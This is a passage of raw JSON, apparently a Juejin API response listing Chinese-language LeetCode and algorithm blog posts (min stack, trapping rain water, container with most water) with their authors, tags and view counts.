"post_article_count": 56, "digg_article_count": 111, "got_digg_count": 72, "got_view_count": 3920, "post_shortmsg_count": 2, "digg_shortmsg_count": 1, "isfollowed": false, "favorable_author": 0, "power": 111, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546592, "tag_id": "6809640499062767624", "tag_name": "算法", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/68a1097944c7fa1d7961.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1439503293, "mtime": 1631692675, "id_type": 9, "tag_alias": "", "post_article_count": 23471, "concern_user_count": 310821}, {"id": 2546983, "tag_id": "6809641039037464589", "tag_name": "LeetCode", "color": "#000000", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/155748584224691639f51dce773ead8d4233400c24546.jpg~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1489518382, "mtime": 1631692819, "id_type": 9, "tag_alias": "", "post_article_count": 6296, "concern_user_count": 11301}], "user_interact": {"id": 6994435150604042247, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516023101020405304626004CE7"}, {"article_id": "6995819745953988644", "article_info": {"article_id": "6995819745953988644", "user_id": "3175804198200456", "category_id": "6809637767543259144", "tag_ids": [6809640398105870343, 6809641039037464589], "visible_level": 0, "link_url": "", "cover_image": "https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/5f37154c029440cfa0f653f4605c1bf0~tplv-k3u1fbpfcp-watermark.image", "is_gfw": 0, "title": "「栈」leetcode 155.取出最小栈", "brief_content": "一、了解题目 附上原题链接:155. 最小栈 设计一个支持 push ,pop ,top 操作,并能在常数时间内检索到最小元素的栈。 push(x) —— 将元素 x 推入栈中。 pop() —— 删", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1628841227", "mtime": "1628845230", "rtime": "1628845219", "draft_id": "6995818719293210631", "view_count": 78, "collect_count": 0, "digg_count": 1, "comment_count": 0, "hot_index": 4, "is_hot": 0, "rank_index": 0.000692, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "3175804198200456", "user_name": "清风伴我行", "company": "", "job_title": "", "avatar_large": "https://sf6-ttcdn-tos.pstatp.com/img/user-avatar/91d1e39b3893315e220a6e34a8a0c916~300x300.image", "level": 1, "description": "周一的知识宝库", "followee_count": 1, "follower_count": 1, "post_article_count": 23, "digg_article_count": 0, "got_digg_count": 10, "got_view_count": 1082, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 20, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546519, "tag_id": "6809640398105870343", "tag_name": "JavaScript", "color": "#616161", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/5d70fd6af940df373834.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1435884803, "mtime": 1631692583, "id_type": 9, "tag_alias": "", "post_article_count": 67405, "concern_user_count": 398956}, {"id": 2546983, "tag_id": "6809641039037464589", "tag_name": "LeetCode", "color": "#000000", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/155748584224691639f51dce773ead8d4233400c24546.jpg~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1489518382, "mtime": 1631692819, "id_type": 9, "tag_alias": "", "post_article_count": 6296, "concern_user_count": 11301}], "user_interact": {"id": 6995819745953988644, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516023101020405304626004CE7"}, {"article_id": "6992970434635366437", "article_info": {"article_id": "6992970434635366437", "user_id": "2181848597012078", "category_id": "6809637767543259144", "tag_ids": [6809641039037464589, 6809640499062767624], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "LeetCode 42 Trapping Rain Water (Tag:Array Difficulty:Hard)", "brief_content": "这是我参与8月更文挑战的第5天,活动详情查看:8月更文挑战 前言 关于 LeetCode 数组类型题目的相关解法,可见LeetCode 数组类型题目做前必看,分类别解法总结了题目,可以用来单项提高。觉", "is_english": 0, "is_original": 1, "user_index": 2.147726993971304, "original_type": 0, "original_author": "", "content": "", "ctime": "1628177838", "mtime": "1628233597", "rtime": "1628233597", "draft_id": "6992943741807886366", "view_count": 44, "collect_count": 0, "digg_count": 1, "comment_count": 0, "hot_index": 3, "is_hot": 0, "rank_index": 0.00068993, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "2181848597012078", "user_name": "AllenLMN", "company": "", "job_title": "前端工程师", "avatar_large": "https://sf3-ttcdn-tos.pstatp.com/img/user-avatar/4d4ee02816f30af451bdf84282e122d9~300x300.image", "level": 1, "description": "会点NLP的前端开发萌新,目标是 瘦十斤换头像", "followee_count": 40, "follower_count": 3, "post_article_count": 34, "digg_article_count": 15, "got_digg_count": 29, "got_view_count": 3623, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 65, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546983, "tag_id": "6809641039037464589", "tag_name": "LeetCode", "color": "#000000", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/155748584224691639f51dce773ead8d4233400c24546.jpg~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1489518382, "mtime": 1631692819, "id_type": 9, "tag_alias": "", "post_article_count": 6296, "concern_user_count": 11301}, {"id": 2546592, "tag_id": "6809640499062767624", "tag_name": "算法", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/68a1097944c7fa1d7961.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1439503293, "mtime": 1631692675, "id_type": 9, "tag_alias": "", "post_article_count": 23471, "concern_user_count": 310821}], "user_interact": {"id": 6992970434635366437, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516023101020405304626004CE7"}, {"article_id": "6967153378098937870", "article_info": {"article_id": "6967153378098937870", "user_id": "2559318802828711", "category_id": "6809637767543259144", "tag_ids": [6809641039037464589, 6809640407484334093, 6809640398105870343], "visible_level": 0, "link_url": "", "cover_image": "https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/ff3ed96779ff4852af36ed2088f82e9a~tplv-k3u1fbpfcp-watermark.image", "is_gfw": 0, "title": "HOT100——寻找两个正序数组的中位数(JS实现)", "brief_content": "题目描述 解题思路 本题采用双指针的解题方法。 一个指针指向数组1。 一个指针指向数组2。 依次比较两个指针指向的元素的大小,谁小谁加到排序好的数组中,直到一方遍历完,将没遍历完的全部加到排序好的数组", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1622166882", "mtime": "1622442618", "rtime": "1622442618", "draft_id": "6967151050621091853", "view_count": 259, "collect_count": 0, "digg_count": 6, "comment_count": 0, "hot_index": 18, "is_hot": 0, "rank_index": 0.00066713, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "2559318802828711", "user_name": "Always_positive", "company": "西安电子科技大学", "job_title": "终身学习者", "avatar_large": "https://sf6-ttcdn-tos.pstatp.com/img/user-avatar/517e82e4420199f579614e9a85b16cf6~300x300.image", "level": 3, "description": "自律、学习", "followee_count": 111, "follower_count": 466, "post_article_count": 521, "digg_article_count": 733, "got_digg_count": 1325, "got_view_count": 53315, "post_shortmsg_count": 17, "digg_shortmsg_count": 24, "isfollowed": false, "favorable_author": 0, "power": 1859, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546983, "tag_id": "6809641039037464589", "tag_name": "LeetCode", "color": "#000000", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/155748584224691639f51dce773ead8d4233400c24546.jpg~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1489518382, "mtime": 1631692819, "id_type": 9, "tag_alias": "", "post_article_count": 6296, "concern_user_count": 11301}, {"id": 2546526, "tag_id": "6809640407484334093", "tag_name": "前端", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/bac28828a49181c34110.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 1, "ctime": 1435971546, "mtime": 1631692835, "id_type": 9, "tag_alias": "", "post_article_count": 88827, "concern_user_count": 527704}, {"id": 2546519, "tag_id": "6809640398105870343", "tag_name": "JavaScript", "color": "#616161", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/5d70fd6af940df373834.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1435884803, "mtime": 1631692583, "id_type": 9, "tag_alias": "", "post_article_count": 67405, "concern_user_count": 398956}], "user_interact": {"id": 6967153378098937870, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516023101020405304626004CE7"}, {"article_id": "6992586885902106638", "article_info": {"article_id": "6992586885902106638", "user_id": "2181848597012078", "category_id": "6809637767543259144", "tag_ids": [6809641039037464589, 6809640499062767624], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "LeetCode 41 First Missing Positive (Tag:Array Difficulty:Hard)", "brief_content": "这是我参与8月更文挑战的第4天,活动详情查看:8月更文挑战 前言 关于 LeetCode 数组类型题目的相关解法,可见LeetCode 数组类型题目做前必看,分类别解法总结了题目,可以用来单项提高。觉", "is_english": 0, "is_original": 1, "user_index": 2.171231765800281, "original_type": 0, "original_author": "", "content": "", "ctime": "1628088582", "mtime": "1628132875", "rtime": "1628132875", "draft_id": "6992575962252591135", "view_count": 75, "collect_count": 0, "digg_count": 0, "comment_count": 0, "hot_index": 3, "is_hot": 0, "rank_index": 0.00065989, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "2181848597012078", "user_name": "AllenLMN", "company": "", "job_title": "前端工程师", "avatar_large": "https://sf3-ttcdn-tos.pstatp.com/img/user-avatar/4d4ee02816f30af451bdf84282e122d9~300x300.image", "level": 1, "description": "会点NLP的前端开发萌新,目标是 瘦十斤换头像", "followee_count": 40, "follower_count": 3, "post_article_count": 34, "digg_article_count": 15, "got_digg_count": 29, "got_view_count": 3623, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 65, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546983, "tag_id": "6809641039037464589", "tag_name": "LeetCode", "color": "#000000", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/155748584224691639f51dce773ead8d4233400c24546.jpg~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1489518382, "mtime": 1631692819, "id_type": 9, "tag_alias": "", "post_article_count": 6296, "concern_user_count": 11301}, {"id": 2546592, "tag_id": "6809640499062767624", "tag_name": "算法", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/68a1097944c7fa1d7961.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1439503293, "mtime": 1631692675, "id_type": 9, "tag_alias": "", "post_article_count": 23471, "concern_user_count": 310821}], "user_interact": {"id": 6992586885902106638, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516023101020405304626004CE7"}, {"article_id": "6995175994487210020", "article_info": {"article_id": "6995175994487210020", "user_id": "3025489497950094", "category_id": "6809637767543259144", "tag_ids": [6809640499062767624, 6809641039037464589], "visible_level": 0, "link_url": "", "cover_image": "https://p9-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/aeb15127921a42ba842febd8d3b778d2~tplv-k3u1fbpfcp-watermark.image", "is_gfw": 0, "title": "「前端刷题」11. 盛最多水的容器", "brief_content": "给你 n 个非负整数 a1,a2,...,a``n,每个数代表坐标中的一个点 (i, ai) 。在坐标内画 n 条垂直线,垂直线 i", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1628691460", "mtime": "1628738305", "rtime": "1628738305", "draft_id": "6995175153990795301", "view_count": 60, "collect_count": 0, "digg_count": 1, "comment_count": 0, "hot_index": 4, "is_hot": 0, "rank_index": 0.00065931, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "3025489497950094", "user_name": "明无生", "company": "武林", "job_title": "侠客", "avatar_large": "https://sf3-ttcdn-tos.pstatp.com/img/user-avatar/2d4deb94951dc1809fbb962839fc092f~300x300.image", "level": 1, "description": "无怨无悔我走我路,走不尽天涯路。", "followee_count": 0, "follower_count": 0, "post_article_count": 31, "digg_article_count": 2, "got_digg_count": 12, "got_view_count": 1807, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 30, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546592, "tag_id": "6809640499062767624", "tag_name": "算法", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/68a1097944c7fa1d7961.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1439503293, "mtime": 1631692675, "id_type": 9, "tag_alias": "", "post_article_count": 23471, "concern_user_count": 310821}, {"id": 2546983, "tag_id": "6809641039037464589", "tag_name": "LeetCode", "color": "#000000", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/155748584224691639f51dce773ead8d4233400c24546.jpg~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1489518382, "mtime": 1631692819, "id_type": 9, "tag_alias": "", "post_article_count": 6296, "concern_user_count": 11301}], "user_interact": {"id": 6995175994487210020, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516023101020405304626004CE7"}, {"article_id": "6964541421487390734", "article_info": {"article_id": "6964541421487390734", "user_id": "2559318802828711", "category_id": "6809637767543259144", "tag_ids": [6809641039037464589], "visible_level": 0, "link_url": "", "cover_image": "https://p6-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/b3e40c67f2364fb9bd95b7728248da46~tplv-k3u1fbpfcp-watermark.image", "is_gfw": 0, "title": "剑指Offer——把字符串转换成整数(JS实现)", "brief_content": "题目描述 解题思路 本题需要考虑的一是数值是由范围的,其次就是正则表达式怎么写,当然本题也可以不使用正则表达式,但是本次题解采用的是正则,因为这样简单易懂。 首先去除字符串两侧的空格。 使用正则表达式", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1621558736", "mtime": "1621578897", "rtime": "1621578897", "draft_id": "6964539746294956046", "view_count": 317, "collect_count": 0, "digg_count": 5, "comment_count": 0, "hot_index": 20, "is_hot": 0, "rank_index": 0.00065754, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "2559318802828711", "user_name": "Always_positive", "company": "西安电子科技大学", "job_title": "终身学习者", "avatar_large": "https://sf6-ttcdn-tos.pstatp.com/img/user-avatar/517e82e4420199f579614e9a85b16cf6~300x300.image", "level": 3, "description": "自律、学习", "followee_count": 111, "follower_count": 466, "post_article_count": 521, "digg_article_count": 733, "got_digg_count": 1325, "got_view_count": 53315, "post_shortmsg_count": 17, "digg_shortmsg_count": 24, "isfollowed": false, "favorable_author": 0, "power": 1859, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546983, "tag_id": "6809641039037464589", "tag_name": "LeetCode", "color": "#000000", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/155748584224691639f51dce773ead8d4233400c24546.jpg~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1489518382, "mtime": 1631692819, "id_type": 9, "tag_alias": "", "post_article_count": 6296, "concern_user_count": 11301}], "user_interact": {"id": 6964541421487390734, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516023101020405304626004CE7"}, {"article_id": "6983929411657531423", "article_info": {"article_id": "6983929411657531423", "user_id": "2568097069536599", "category_id": "6809637767543259144", "tag_ids": [6809640499062767624, 6809641039037464589], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "LeetCode第86题:分隔链表", "brief_content": "题干 给你一个链表的头节点 head 和一个特定值 x ,请你对链表进行分隔,使得所有 小于 x 的节点都出现在 大于或等于 x 的节点之前。 你应当 保留 两个分区中每个节点的初始相对位置。 实例1", "is_english": 0, "is_original": 1, "user_index": 2.234293227019025, "original_type": 0, "original_author": "", "content": "", "ctime": "1626072831", "mtime": "1626081795", "rtime": "1626081795", "draft_id": "6983929318850658340", "view_count": 100, "collect_count": 1, "digg_count": 2, "comment_count": 0, "hot_index": 7, "is_hot": 0, "rank_index": 0.00065723, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "2568097069536599", "user_name": "奥奥奥", "company": ".", "job_title": "💰端开发", "avatar_large": "https://sf1-ttcdn-tos.pstatp.com/img/user-avatar/1a54c595972706e5b0bc897159879404~300x300.image", "level": 2, "description": "", "followee_count": 7, "follower_count": 20, "post_article_count": 134, "digg_article_count": 189, "got_digg_count": 239, "got_view_count": 13812, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 377, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546592, "tag_id": "6809640499062767624", "tag_name": "算法", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/68a1097944c7fa1d7961.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1439503293, "mtime": 1631692675, "id_type": 9, "tag_alias": "", "post_article_count": 23471, "concern_user_count": 310821}, {"id": 2546983, "tag_id": "6809641039037464589", "tag_name": "LeetCode", "color": "#000000", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/155748584224691639f51dce773ead8d4233400c24546.jpg~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1489518382, "mtime": 1631692819, "id_type": 9, "tag_alias": "", "post_article_count": 6296, "concern_user_count": 11301}], "user_interact": {"id": 6983929411657531423, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516023101020405304626004CE7"}, {"article_id": "6991837040962699277", "article_info": {"article_id": "6991837040962699277", "user_id": "2181848597012078", "category_id": "6809637767543259144", "tag_ids": [6809641039037464589], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "LeetCode 39 Combination Sum (Tag:Array Difficulty:Medium)|8月更文挑战", "brief_content": "前言 关于 LeetCode 数组类型题目的相关解法,可见LeetCode 数组类型题目做前必看,分类别解法总结了题目,可以用来单项提高。觉得有帮助的话,记得多多点赞关注哦,感谢! 题目描述 给定一个", "is_english": 0, "is_original": 1, "user_index": 2.356581185211474, "original_type": 0, "original_author": "", "content": "", "ctime": "1627913940", "mtime": "1627962203", "rtime": "1627962203", "draft_id": "6991823327430098951", "view_count": 65, "collect_count": 0, "digg_count": 0, "comment_count": 0, "hot_index": 3, "is_hot": 0, "rank_index": 0.00065027, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "2181848597012078", "user_name": "AllenLMN", "company": "", "job_title": "前端工程师", "avatar_large": "https://sf3-ttcdn-tos.pstatp.com/img/user-avatar/4d4ee02816f30af451bdf84282e122d9~300x300.image", "level": 1, "description": "会点NLP的前端开发萌新,目标是 瘦十斤换头像", "followee_count": 40, "follower_count": 3, "post_article_count": 34, "digg_article_count": 15, "got_digg_count": 29, "got_view_count": 3623, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 65, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546983, "tag_id": "6809641039037464589", "tag_name": "LeetCode", "color": "#000000", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/155748584224691639f51dce773ead8d4233400c24546.jpg~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1489518382, "mtime": 1631692819, "id_type": 9, "tag_alias": "", "post_article_count": 6296, "concern_user_count": 11301}], "user_interact": {"id": 6991837040962699277, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516023101020405304626004CE7"}, {"article_id": "6987217727769280519", "article_info": {"article_id": "6987217727769280519", "user_id": "2181848597012078", "category_id": "6809637767543259144", "tag_ids": [6809641039037464589, 6809640499062767624], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "LeetCode 34 Find First and Last Position of Element (Tag:Array Difficulty:Mid)", "brief_content": "前言 关于 LeetCode 数组类型题目的相关解法,可见LeetCode 数组类型题目做前必看,分类别解法总结了题目,可以用来单项提高。觉得有帮助的话,记得多多点赞关注哦,感谢! 题目描述 给定一个", "is_english": 0, "is_original": 1, "user_index": 2.390835950622662, "original_type": 0, "original_author": "", "content": "", "ctime": "1626838466", "mtime": "1626849913", "rtime": "1626849913", "draft_id": "6986944101065162760", "view_count": 100, "collect_count": 0, "digg_count": 0, "comment_count": 0, "hot_index": 5, "is_hot": 0, "rank_index": 0.00063765, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "2181848597012078", "user_name": "AllenLMN", "company": "", "job_title": "前端工程师", "avatar_large": "https://sf3-ttcdn-tos.pstatp.com/img/user-avatar/4d4ee02816f30af451bdf84282e122d9~300x300.image", "level": 1, "description": "会点NLP的前端开发萌新,目标是 瘦十斤换头像", "followee_count": 40, "follower_count": 3, "post_article_count": 34, "digg_article_count": 15, "got_digg_count": 29, "got_view_count": 3623, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 65, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546983, "tag_id": "6809641039037464589", "tag_name": "LeetCode", "color": "#000000", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/155748584224691639f51dce773ead8d4233400c24546.jpg~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1489518382, "mtime": 1631692819, "id_type": 